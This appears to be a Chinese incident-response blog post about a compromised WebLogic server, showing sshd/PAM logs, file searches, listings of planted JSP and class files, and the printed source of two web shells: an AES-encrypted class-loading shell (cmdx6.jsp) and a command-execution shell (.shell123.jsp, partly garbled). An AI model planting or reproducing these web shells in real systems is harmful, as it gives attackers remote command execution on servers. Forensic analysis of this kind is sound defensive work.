

Sep  2 09:55:42 Web1 sshd[26868]: PAM adding faulty module: /lib64/security/pam_tally.so
Sep  2 09:55:52 Web1 sshd[26868]: pam_unix(sshd:session): session opened for user webuser by (uid=0)
Sep  2 10:03:10 Web1 sshd[26868]: pam_unix(sshd:session): session closed for user webuser
Sep  2 23:05:38 Web1 su: PAM unable to dlopen(/lib64/security/pam_tally.so): /lib64/security/pam_tally.so: cannot open shared object file: No such file or directory
Sep  2 23:05:38 Web1 su: PAM adding faulty module: /lib64/security/pam_tally.so

Sep  3 10:45:24 Web1 sshd[978]: PAM unable to dlopen(/lib64/security/pam_tally.so): /lib64/security/pam_tally.so: cannot open shared object file: No such file or directory
Sep  3 10:45:24 Web1 sshd[978]: PAM adding faulty module: /lib64/security/pam_tally.so
Sep  3 10:45:34 Web1 sshd[978]: pam_unix(sshd:session): session opened for user webuser by (uid=0)



查看所有进程,发现有当天运行的进程命令。都是/bin/bash 或 /bin/sh。 查看这两个文件创建时间,都是正常的。


[root@Web1 ~]# find / -ctime 3


发现不少目录都有生成没见过的文件 cmdx2.jsp,.shell123.jsp,还有class类的文件。

[root@Web1 _WL_internal]# cd bea_wls_internal/
[root@Web1 bea_wls_internal]# cd i1t0h/
[root@Web1 i1t0h]# ls
jsp_servlet  public  war
[root@Web1 i1t0h]# cd war/


[root@Web1 war]# ls -al
total 32
drwxr----- 4 cwt cwt 4096 Sep  5 16:07 .
drwxr----- 5 cwt cwt 4096 Sep  2 14:15 ..
-rw-r----- 1 cwt cwt    1 Jun 20 15:20 .beamarker.dat
-rw-r----- 1 cwt cwt  611 Sep  3 11:05 cmdx666.jsp
-rw-r----- 1 cwt cwt   49 Jun 20 15:20 index.html
drwxr----- 2 cwt cwt 4096 Jun 20 15:20 META-INF
-rw-r----- 1 cwt cwt 1169 Sep  2 14:14 .shell123.jsp
drwxr----- 2 cwt cwt 4096 Jun 20 15:20 WEB-INF
[root@Web1 war]# cd ..
[root@Web1 i1t0h]# ls
jsp_servlet  public  war
[root@Web1 i1t0h]# cd jsp_servlet/
[root@Web1 jsp_servlet]# ls
___46_shell123.class  __cmdx2.class  __cmdx5.class  __cmdx6.class  __cmdx6$U.class  __test111.class  __test111_jspx.class
[root@Web1 jsp_servlet]# ll
total 60
-rw-r----- 1 cwt cwt  6466 Sep  2 14:15 ___46_shell123.class
-rw-r----- 1 cwt cwt  6436 Sep  2 14:50 __cmdx2.class
-rw-r----- 1 cwt cwt 15796 Sep  3 10:58 __cmdx5.class
-rw-r----- 1 cwt cwt  6044 Sep  3 11:04 __cmdx6.class
-rw-r----- 1 cwt cwt   767 Sep  3 11:04 __cmdx6$U.class
-rw-r----- 1 cwt cwt  5998 Sep  2 22:55 __test111.class
-rw-r----- 1 cwt cwt  6020 Sep  2 22:56 __test111_jspx.class


[root@Web1 war]# cat cmdx6.jsp
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("pass")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>

[root@Web1 war]# cat .shell123.jsp
<%@ page contentType="text/html; charset=UTF-8" %>
<%@ page import="java.io.*" %>

String cmd = request.getParameter("cmd");
String output = "";
if (cmd !=null && cmd != "")
        String[] command = System.getProperty("os.name").toLowerCase().indexOf("windows")>-1 ? new String[] {"cmd.exe", "/c", cmd} : new String[] {"/bin/sh", "-c", cmd};

        String s = null;
                Process p = Runtime.getRuntime().exec(command);
                BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
                while ((s = sI.readLine()) != null)
                        output += s +"\r\n";
                BufferedReader sI1 = new BufferedReader(new InputStreamReader(p.getErrorStream()));
                while ((s = sI1.readLine()) != null)
                        output += s +"\r\n";
        catch (IOException e)

    else output="cmd shell";

<pre> <code><%=output%> </code></pre>







《www.micoder.cc》 虚拟化云计算,系统运维,安全技术服务.
